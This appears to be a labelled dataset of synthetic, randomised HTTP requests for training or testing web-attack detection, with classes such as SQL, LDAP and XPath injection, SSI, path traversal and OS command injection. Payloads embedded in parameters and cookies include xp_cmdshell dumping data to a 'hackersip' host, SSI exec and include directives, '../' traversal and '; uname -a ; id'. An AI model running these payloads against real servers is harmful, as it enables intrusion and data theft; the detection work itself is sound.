Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 62.56.145.236
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40556
Start - Id: 36400
class: OsCommanding
PUT /6E/Eerp.asmx? HTTP/1.1
Content-Length: 346
Content-Language: 7atnr
Content-Encoding: gzip
Content-Location: http://www.elehv.com/uctpketd/eeenela9.cgi
Content-MD5: ZWl0Ums2MWNheHNidGlvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Mar 05 21:25:39 GMT
Host: 128.201.90.142
Connection: close
Accept: */*
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=3
Date: Wed, 16 Aug 06 08:56:40 GMT
If-Match: *
Authorization: NTLM SWdlc3V1QWFhdmlUZWxydUVla3Npb2hvbGV0ajFUY3Njd2VyaGk=
Referer: /udhms8t/qncto/oE2azvti.exe
User-Agent: Mozilla/5.9 (compatible; trdfsa3Im; Linux i386; sfrngipp)

efa3a9dihI0aia=8441551419&ie=aro6srtlvarfhavinga8t&cymi=aOcio&rtsylonpGsppo9X=xcxeeA1tlom&8rrsrosMezh=n5o&edlaRttr=neae&scriptlxF=mZcx4&eohrt=3452662800&tp=seZmFu3fv&hqenwaaheEea=exec xp_cmdshell     'bcp  "select  *     from oed"    queryout pwdump.exe -c   -Craw   -Shackersip   -Usa -Ph8ck3r'&Q-2Dboot.iniIj=Aosehk-p&&so=h~&lsfl=tt

End - Id: 36400
Start - Id: 40197
class: SSI
GET /hgwsmrrhfsNeiiyhteeR/r@tmp84Y4execapassthrutPJ/e7I@kTi/hlortu2a/aat31avy6e7mtetes/taeacrstniv2ad/aXSiSi9qF1/ux20bqEihK9z.png?tZeiridoeOeu=8559581283&ehmuvu1etmeor=cp0%24&tLeneirsaqadtc=mnc+feeo%3C3lcmdhes&5wl4Tlsogcn=tptPexyM&9aa4axquSAbeu=sFcosxcFs&hr0enaIsi6R=+c%25ah&.JL7SxmlV_zC=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2F7I%2FnhO5%22++--%3E&oogEultentlEu=%3CDty&Tet=tyntEwp-trx&clu=3wTaitferoienD2El2&oohpnhvour9neer=ettm+nefa4+ecrhtaccesio+e&eoenwrrea2eno=%3E&oiloil7t=ri HTTP/1.0
Host: 155.189.237.48:80
Connection: keep-alive
Accept: image/jpeg, text/*;q=0.1, audio/x-wav;q=0.5
Accept-Charset: x-mac-greek;q=0.3, isiri-3342;q=0.5
Accept-Encoding: gzip;q=0.2, identity, compress, compress
Accept-Language: *
Cache-Control: min-fresh=927
Client-ip: 75.82.91.174
Cookie: ies=selectpassthru;r.f.51W0O=sie;afDbo9p=69970;n1tjwoszs=oyrww
Cookie2: $Version="3"
Date: Fri, 29 Sep 06 09:00:01 GMT
ETag: "@BYOpdJ6S6t7PhQHXVU"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 06 Sep 06 01:53:09 CET
If-Unmodified-Since: Sat, 17 Nov 07 11:48:55 GMT
If-Match: "-gKSHtXORuiqF@oV"
If-None-Match: "zczDglTZwtNi7SShsU"
If-Range: Fri, 11 Jan 08 05:44:12 UTC
Max-Forwards: 4172
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="ttma1tHn"
Range: -8389
Referer: http://www.lniy9me.st/dhntiaa.sh
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.5 (X11; U; Linux i586 9.0; eo-2n; rv:4.4.1) Gecko/44682546
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9646x716
Via: 1.6 112.250.38.110
Transfer-Encoding: gzip
Upgrade: aiaEi/3.2, nenl/7.3
Warning: 193 214.100.46.242 "rhape" 
X-Serial-Number: 5910838983690
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40197
Start - Id: 40995
class: SqlInjection
POST /dauathfytE2th4b/iPXlTW/l8Ken1Xs_T4QfaU/pT2_/aweleeotc.html? HTTP/1.1
Content-Length: 195
Content-Language: hsncf1ke
Content-Encoding: compress
Content-MD5: c3JodWxuZWtOZWxueWVuZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 04 Apr 10 01:34:57 GMT
Host: www.seieadzrt.ch:80
Connection: eSrni
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.2, windows-1254, utf-7;q=0.8, windows-1254, x-mac-icelandic;q=0.5
Accept-Encoding: compress, compress, compress, deflate
Accept-Language: R4eenboe-nesfwde, aOxtcoe-Ih4, 3hHNh-ai, DeH1-aemEii;q=0.8, i-tlna26da
Cache-Control: no-cache
Client-ip: 248.121.203.33
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="0"
Date: Mon, 03 Oct 05 15:50:32 CET
ETag: "vXvN5UnvPs4m@hSmv5"
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Dec 09 22:13:53 GMT
Max-Forwards: 975
Authorization: NTLM bG5lYXFheWV0YWZ5dGVpaG1lMHJneHNiYzJzY3duZXdkYXZyZjFubw==
Referer: /rJsaCune/cknxjeeo/on4Ol9sp.msf
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/1.8 (compatible; d6i7e; Open BSD i586; jshcFahi)
UA-Pixels: 892x2342
Via: 6.6 239.119.208.26:7, sru/3.0 www.ona8s.png, 6.4 www.eemi.jpg
Transfer-Encoding: gzip
X-Forwarded-For: 181.40.75.124

eM=4172&ron=mr:aUar@Ceval&iovsu=iLaitheqienah&Rels8teg6a=6&MyyLtDfm.IGh=iw-)&4P9OzCe1kJz4=';EXEC master.dbo.xp_cmdshell    'cmd.exe&onwUrlsw8zmtout=9640&J1na3ovyv=i8&jXisoTTlnlt=20602

End - Id: 40995
Start - Id: 37164
class: LdapInjection
GET /gzlsse/yj_jYcCiZEN/1QUUYK9FbRrZiE.html?O_bx=saelvesug%3Bk&oa5lj1laa=%29++%28++%7C++++%28displayName%3Dhad*%29+%28name++++%3Dhad*+++%29%28+mail%3Dhad*+++%29&EclJwgetp8httpAz6o=4083&clgeI=3573473241&7nerEciaNappacw=5269&d6gonperieau=tyFKAG&r8ufEsaier=2&rstdinzGsXpc=6veobject%3Ejm6rconnectmdOssip&p4hp0olo=mzcReDq&aS=L%3Era&xOhzrosahs7vrre=+e7j9ere9Ntge&dts=gEe&oJq1=amhne8mxn&sicct9=76072 HTTP/1.1
Host: www.Emyse.uk:06796
Connection: xtjHtstx
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.7, identity;q=0.9
Accept-Language: 2tyhi-narn, a-naiTeto0;q=0.0, ed-f, 4n-h2smate
Cache-Control: max-stale=460
Client-ip: 188.238.110.194
Cookie: odc=s;vc=h9_JiB7B;fcoDe=okthbesatdpijboea;ek13rlTotusinoT=8128768
Cookie2: $Version="45"
Date: Wed, 21 Jan 09 03:13:10 GMT
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Thu, 12 Jan 06 01:17:12 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: *
Max-Forwards: 40
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: /iq4tnWc/ritu.dll
TE: trailers
Trailer: Via
User-Agent: 3ettrirg (ajYrL2U; e5ICo@j; dwq0GTo; pWNJUHJVlK; eUzNPY9Y4p)
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5776x2501
Via: 1.4 www.Eetgej.png, 8.5 100.100.233.3:6541, 0.5 www.lhes1.js
Transfer-Encoding: rsannr; Ttaq=o0shies
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37164
Start - Id: 49134
class: XPathInjection
GET /iAY9eXn/ohtSuee8e/eNAXJ5pgfechoDhN/MEYS/andE4.5GWE4XXqNjposition/o64cPQI1Ignjr/iIheehRbeeadhons/ozYdBlj/McEc/aGWED._./a@A/mZ8R.php4?jeev7=0di0lnoden%3DiBT%25aosecho%3Bu&hbndsnmottoe=iee%3DYoepositionos+ra6&etgSlsa1qrirtk=53&etetteofiCbnc9o=v+%3Db%2F+ioait-&naePeDo9bemr3=exuE19gp&ctfad=36723420&nl=1499506&ls=36120+++++or++++1%3C++j2%2Fhlnec%2Fo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D745%5D+or+20495%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&cwyYVWw4CEC=207678&ctiaI5etPqt=6995&chw3=jVhMQSbBsgCb&mxbcisqoHAhdS=OEFoeekrnq9giteEn HTTP/1.0
Host: 102.177.149.78
Connection: keep-alive
Accept: audio/*, image/*;q=0.9
Accept-Charset: big5, x-mac-turkish;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 63.41.96.252
Cookie: 9S@8OFK=p7PN;AbgsoundnQg0A=oissposition t1inq;access_logJOjpEEb=tdUp;aadali1v=ub4e)
Cookie2: $Version="860"
Date: Tue, 18 Aug 09 02:57:39 CET
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Fri, 11 Jan 08 08:06:02 GMT
If-Unmodified-Since: Thu, 04 Mar 04 12:55:09 CET
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "2OeEYUsOl3sFDs_H"
If-Range: *
Max-Forwards: 87
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: E11su gdAiio=W96tf0
Authorization: Basic MGVCSWVvUHA6aWhoYWQ=
Range: 6-
Referer: http://dkeuau.cz/G5zrus/laElo3us/lnnIlei.wav
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 3.8; ti-Os; rv:7.4.5) Gecko/63913638
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: 9.7 48.110.235.129, agsosg/6.9 255.17.61.191, HTTP/9.1 141.91.137.225
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49134
Start - Id: 42678
class: SqlInjection
GET /qL1S9g4N..gif?2heteenaeaeZeo=++++OR+2++++%3E++1 HTTP/1.1
Host: 214.177.60.253
Connection: close
Accept: application/x-tar, text/*;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 219.244.18.221
Cookie: ul7nt6oshgnoo=ax5wolt9stfsfeessS;7nausEldontoitw=enimeisumc7k1;tdsy2Qob0=936
Date: Tue, 31 Aug 04 03:01:25 GMT
ETag: "xm_kl@DG33VU5oJ"
Expect: 100-continue
From: keNoy@ouhsnitwek.de
If-Modified-Since: Sun, 18 Apr 10 09:38:13 UTC
If-Unmodified-Since: Sun, 17 Apr 05 03:23:00 GMT
If-Match: "eW-wzrCDIYGIzFORTWOn"
If-None-Match: *
If-Range: Wed, 07 Jan 09 09:50:36 UTC
Max-Forwards: 758
Pragma: no-cache
Proxy-Authorization: Ucpa mdqmNe=m0csrt
Authorization: ewseA esnie=ob1s
Range: 1-0,751199-8
Referer: http://www.oeten.it/NtEeI.pl
TE: chunked;q=0.2
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 6.9; AN-ne; rv:2.9.4) Gecko/03029337
UA-CPU: MIPS
Transfer-Encoding: identity
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42678
Start - Id: 49476
class: XPathInjection
GET /yqD@ch0yWJh5y/olPvPIe/QGXoFtkI/NPC/oh/_T1/ilriidyip/KJew2qEVS/shAHqu/tVz9yf/eNygHHnXP@LK.gif?aomegsma=d4znoe%27+++++or++++1%3C++++lei%2FF%2FbfoqA%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D++++or+%27rOerdtna%27++%3D++%27&RevalXcopyKDdHb0S=+tetformmeheuntmen&re0t9iePvyse8=13&bzswhg=Bbqi5ann89gTeA HTTP/1.1
Host: www.q1rittjeIk.uk
Connection: dEdhe
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ylnwe-ri, rsSeeke3-5dI;q=0.1, tTef-D, Geqn-e
Cache-Control: r4t=mNau2
Client-ip: 79.176.207.17
Cookie: hniaA=30471786;klanUttstf=fceil;ha6=159829;0a4=rShRhedeswohi0t7;ns=teo;UdRttz=ntin oflhAk
Cookie2: $Version="351"
Date: Mon, 27 Jun 05 07:41:15 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: haatt@hdst54eL.net
If-Modified-Since: Tue, 01 Jan 08 02:32:22 CET
If-Unmodified-Since: Thu, 11 May 06 16:51:59 CET
If-Match: "_CD6R3wku-0wHkupP@M"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.1
Pragma: jesi=cml3no
Proxy-Authorization: NTLM ZGJhd2loU296bXRodWhvRVdlZGxvYWVvNHRlc3NleWszc3VlbjJyaHM3VHN2
Authorization: ed4p ewtc5lar=tiKyS
Range: -012
Referer: /mrnohxan/oias/e9ewz/lmnb/nneqo.msf
TE: trailers,gzip;q=0.0
Trailer: Cache-Control
User-Agent: nXo36Aere
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 201583507
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49476
Start - Id: 48428
class: XPathInjection
GET /jCOGDCjAQv/iuiEehybahail9mfta/sdradfuikigr/n0QD_-6G3jjB2zp07ek/7-ZoI2MroptlBDA8/N4ieeTIC6XdW.css?roiht=rS7X5ly6o-6U&sorhcgnogleo4s=1683942302&nAAeo=eaohoce8dIhoi&cu=906&eos1Tuaei4hNp0m=377153 HTTP/1.1
Host: 207.141.30.54:351
Connection: keep-alive
Accept: application/*;q=0.8, image/gif;q=0.9, image/*
Accept-Charset: iso-8859-5, x-mac-japanese, x-mac-korean;q=0.8, hz-gb-2312;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: ihn='sqhwt'
Client-ip: 16.212.82.253
Cookie: sSralcxZgo=6N7leu'   or   path/child::node()[position()=N]   or   'a5'    = '
Cookie2: $Version="113"
Date: Thu, 21 Jul 05 13:58:55 CET
ETag: W/"2.yjLYJ6T4wy15paVNlJ"
Expect: 100-continue
From: Jhte@ioNeu6fte.fr
If-Modified-Since: Fri, 13 Apr 07 14:39:45 UTC
If-Unmodified-Since: Wed, 23 Aug 06 19:48:23 GMT
If-Match: "fuI_6pBR87jSYpwu5g32"
If-None-Match: "M4OeLq82EUfFWIX00wu"
If-Range: Wed, 15 Jun 05 04:33:09 UTC
Max-Forwards: 05
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic bHFzZ29pd0U6cnRhc3NhZWk=
Authorization: Basic dGVUZWV3cnM6ak5UZXRtaQ==
Range: 548-7,-320,16122-
Referer: /EaidaA/oevpmcsh/Ogrrht/eySt.asp
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/2.7 (X11; U; Linux i586 1.5; st-gn; rv:9.0.6) Gecko/08525346
UA-CPU: MIPS
UA-Disp: 842,949,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 679x1552
Via: FTP/2.5 www.eEno.png, ra3b/2.1 120.79.174.145
Transfer-Encoding: deflate
Upgrade: 7eaeH/4.4
Warning: 812 www.ewsMWm.shtml "10oeOab" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48428
Start - Id: 40126
class: SSI
GET /tGAnkDt/aN/pmkG@kY/e4eiytS.shtml?6wS4gawp-j=77&eB=%3D5Twlsyiewf&5eTs=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fls++-l+++++%2Fhome%2Fdci%2F4Rds9e%22+++--%3E&iubhih8=as+wuiae%2BpuLl%5Ckj&houd8dotcoyHe=9iaoeyltvj&olrevlmqwwce=0160100&uer=23&3NwcoKI3VrQ=%25%5Diosdrml8tNt%24s+r6sN&es1a9rnvDruHar=51 HTTP/1.1
Host: www.pefs8.org
Connection: close
Accept-Charset: iso-8859-3, x-mac-cyrillic, x-mac-japanese;q=0.9, utf-7;q=0.8
Accept-Encoding: identity;q=0.5, identity, compress, deflate;q=0.3
Client-ip: 242.30.130.175
Date: Thu, 30 Nov 06 18:49:33 GMT
Pragma: no-cache
Authorization: NTLM bWJ3Y25lYWNsYWdld29oc3VlU2RzdHRlblRyY2VoRXNzMUF1cmllcmVuZWhpTUc=
Referer: http://hmnSzlh.fr/hhhi/eTuse/Mrbtstss/2ysssmil/aset.ace
User-Agent: Mozilla/8.5 (X11; U; Linux i586 6.2; l3-ro; rv:9.6.1) Gecko/03078660

null

End - Id: 40126
Start - Id: 35889
class: XPathInjection
PUT /oppce/ketsras/vZ-/hp/Sg16n.htm? HTTP/1.1
Content-Length: 223
Content-Language: nt,naP
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Sep 07 22:23:46 GMT
Host: www.4wtc.com
Connection: aonio
Accept-Encoding: *;q=0.1
Accept-Language: at'   or iatr/ows/child::node()[processing-instruction()=54]    or   'e7aeNi'  =  '
Cache-Control: gtj4eke=1iet
Date: Mon, 19 Apr 10 19:34:50 UTC
If-Match: "Ju9uXMl0mohFcAb"
If-Range: *
Range: -23690,93-568748,-273092
Referer: http://lPm6aa.cz/toOhtT52/iytTinl.php3
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 2.2; tn-aB; rv:5.5.5) Gecko/96640913
Upgrade: isre/2.5, fTav/7.2, rrvnwi/3.7, gsd/4.7
X-Serial-Number: 503350081562336

wfop=0&ie=taDnEi&bWrTF=o2lto&ij4dmgDorAs=nands&ywA=648836&e5hpeam=eiwj&Peraunehvtvdli=8o2cWTIaMZ.&too3Efsmea=beel8krB&fdsehihirncr=jAo&dhersone=lso&utdeaa8io=Natioja&i2srusgsei2=0A+wbh4Niei&s8ytnRdaapI4I6=anuHtehwm1ddsnao

End - Id: 35889
Start - Id: 36052
class: PathTransversal
GET /oej6rsspa1erfsccTeeP/dicleNBPt/tsrrelcsiheEcioorseo/15cLHoScX/nN5r2ds5T8E/tggyKRpka5LYXQ/ca.php3?bbayrrurq6h9cnp=seVdcopycat&xtermlnph-passwdwRgpMk7=0685&rnlLa=97766416&mbvu=wHiskskh&bhEcmhiurw=i%2B&sbieab4rh=c3OD&Y6Ir1X=rk1f4iRqE&t1NDhedneire=hewindow.open%28+hIateh&ti=y4ciya2e&vadrcrai1=ktJifkeeruNlzrhw3&lahocu2RqmauOA=907884&s4pjep=dO%2F%27&eYyhuriesO=gebody%7Cea%27og+tmp+%7E%28+tl4Sh&4Hnaohn=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fer%2Farraannt%2Fonre%2Fil.msf HTTP/1.0
Host: www.NIsza.com
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: nbwlll-e;q=0.7, stsabi-a;q=0.9, Ua-pZaRe, ahertstm-em;q=0.1
Cache-Control: max-age=3182
Client-ip: 54.187.94.95
Cookie: iw02cdhrise=t9c;PzkwnedllssOc=82654;odnliw22ol8=8472;Ar=mHVYtq.6
Cookie2: $Version="03"
Date: Sun, 10 Jul 05 20:16:23 UTC
ETag: "G3-c5vBGiX1v8Nv"
Expect: sntd
From: Odatte@nazuaen.net
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Mon, 01 Dec 08 01:11:38 GMT
If-Match: "ZHPJIOmFl2_PVNMY_ju"
If-None-Match: *
If-Range: *
Max-Forwards: 446
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM dUszdjFsdmluY3ViYnZTcmFFcjBlc25zcnRCM3lnblJldXds
Authorization: Digest nc=05dd6aeD
Range: 0502-,-95,28345-0
Referer: /en4B9e.cfm
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 1.6; ae-uN; rv:3.0.8) Gecko/01040983
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: identity
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 919 47.112.49.170 "uvicSPonns9rssR" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 2881124035235
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36052
Start - Id: 44457
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.aNvtgvo.be
Connection: keep-alive
Accept: application/*;q=0.7
Accept-Charset: x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: r=n25l
Client-ip: 1.111.16.222
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="0"
Date: Tue, 27 Apr 10 17:01:42 CET
ETag: "Bc5LCDc_8.QFCBUmEc7y"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: ".7wk_ABn1mKSYzp"
If-None-Match: *
If-Range: "rQm@djib4Bk_j85UwNna"
Max-Forwards: 39
MIME-Version: 1.4
Pragma: trzin='etkp4ct'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Digest opaque="e2ld"
Range: 6-02287,72753-
Referer: /otteg5e/tHtraris.php3
TE: gzip
Trailer: Expect
User-Agent: aCvhl/3.6.9.4.9
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 220.204.75.160, ohtgme/0.2 www.e5eon1t.jpg, 6.0 182.237.117.143
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 315 155.65.62.19 "entgnaeqidlakodma" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44457
Start - Id: 39705
class: SSI
GET /8u2ehe/rwumrruC9yX/AXUJm4Suscriptqextermq79.jpg?mvoWNcteoac4ni=%3C%21--+%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&not2Osun=iehlDtse HTTP/1.1
Host: www.t2iLos.ch
Connection: keep-alive
Accept: text/*, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: b=ca5ab
Client-ip: 101.49.34.176
Cookie: openUPlocationX0j-D=likeosxn80aaz;p4Unmmfe=shutdownssmts Delal~ta
Cookie2: $Version="1"
Date: Mon, 25 May 09 10:04:35 CET
ETag: "eQt1lpFUkKACMULNX9"
Expect: bufr=y5wn1
From: sgmhtoN@smhtT.fr
If-Modified-Since: Fri, 29 Apr 05 15:34:22 CET
If-Unmodified-Since: Wed, 13 Aug 08 03:42:32 UTC
If-Match: "IvKCUr8qbgb3QHm_"
If-None-Match: *
If-Range: Fri, 29 Dec 06 21:53:09 UTC
Max-Forwards: 22
MIME-Version: 7.2
Pragma: sb8dt=Rtlcn
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: /sh5me/vjta/o4B5/ticdi.cgi
TE: gzip,deflate
Trailer: From
User-Agent: elKf4-yO http://www.w3gtvf.org
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: 0.7 195.181.183.129:9457, 1.9 175.111.4.64, 5.1 www.eiPrrn.js
Transfer-Encoding: compress
Upgrade: effn/5.2, ajnt/0.1
Warning: 369 149.111.64.199:3 "eoiihioAuntte" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39705
Start - Id: 37405
class: LdapInjection
GET /quubW3y.hh3Mh1R/hjcdlT8ldItE/oMOmompT/eAsQz8.ddpbb7DwN/2U/ijRQ1F.2pc1kt/5P/eHwim7crs1nt8mo/heeObo594ynr/wJfVHj_M1Pb/tithAasnrmzrndnLoth/eq.mspx?aE3tfsletyg9mi=44879&1afette=n%3BE&ciner=tnayner&niOskgr1r=eci&copyZJPXDT0zDmC=nAefpptbea7heueu&tHetigrlc=UnmDafms&JPps2=3&maOossegvvrd=u+g3eSgai%25m%24%3B%5Dl%40on+%5B&ihpnN=501&K9CHJbunionG_ii=rodtl&oe=5042050592&y2esfaeqOe=cA67Jno&kamrjeSchyc=89&X1xmlexevalRVZ=747684 HTTP/1.0
Host: www.e61Ae9iTi.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.2, gzip;q=0.9, identity, gzip;q=0.3, gzip
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 42.141.102.110
Cookie: 02bqeu=60113;b84Swdcgsiyeab=fnce;V7ks=9;5p0l51o=)    ( | (displayName=had*) (name   =    had*  )(   mail=had*  );td.gG4autoexecX=echoea3nhpsdah
Cookie2: $Version="29"
Date: Mon, 17 May 04 21:33:20 CET
ETag: W/"I4bxWhF3dD.58ZB"
Expect: 100-continue
From: a9rhuT@wsiL.cz
If-Modified-Since: Thu, 12 Aug 04 23:41:23 UTC
If-Unmodified-Since: Wed, 20 Oct 04 16:50:00 GMT
If-Match: *
If-None-Match: "Xzv11zoeoaxBm_NN0A"
If-Range: *
Max-Forwards: 4970
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic aHNkZjpyc29lZQ==
Authorization: Digest uri=/ttxme/eddcps.php
Range: 0-,10-,1914-
Referer: /teaOeiTS.jpeg
TE: trailers,trailers,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: PeisNi (tmBGDq; hl1azuik; c3Uy5gpnr; uA3ZM9O; 3IAy37)
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 233x3973
Via: 8.3 191.18.175.76:905, 9.2 116.161.255.82
Transfer-Encoding: deflate
Upgrade: ontd/7.5, eEr1lt/2.5
Warning: 333 www.7hOnw6sa.css:75192 "5einNKtOttplh03r3xab" "Fri, 05 Jan 07 15:19:33 CET"
X-Forwarded-For: 43.152.31.163
X-Serial-Number: 0741742884020240
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37405
Start - Id: 43451
class: OsCommanding
GET /yLn7a.teuHg.23XD/hk2w/ds9co9PG.php3?sBietSSs=c_gRMZ9&1tbXc6logH=dCEeo&Exeqm=7203&ildsaolpeacuh=wOinZwheree%3D8ar&ii8bua8ohLhfre=+%3B+++++echo+++++%3B+w+++++%3Buname+++++-a++%3Bid&eetlhsi=ihdul9cer&a8w5fin=nbb&-ibodyGjiin=0187721&neo=5614163543&reekrokbsa=gJxT7&cKwCh=oe%27sformaeote&cegyoted6sch=hhLfaIXyhKfY HTTP/1.1
Host: 103.106.26.52:80
Connection: keep-alive
Accept: text/*;q=0.3, video/mpeg
Accept-Charset: x-mac-roman;q=0.8, windows-1253, x-mac-chinesetrad
Accept-Encoding: *;q=0.7
Accept-Language: t1-jw, oeeky-ltsesem;q=0.6, D-5dwatEll, eoeaa-kj;q=0.1
Cache-Control: max-stale=1
Client-ip: 62.234.202.158
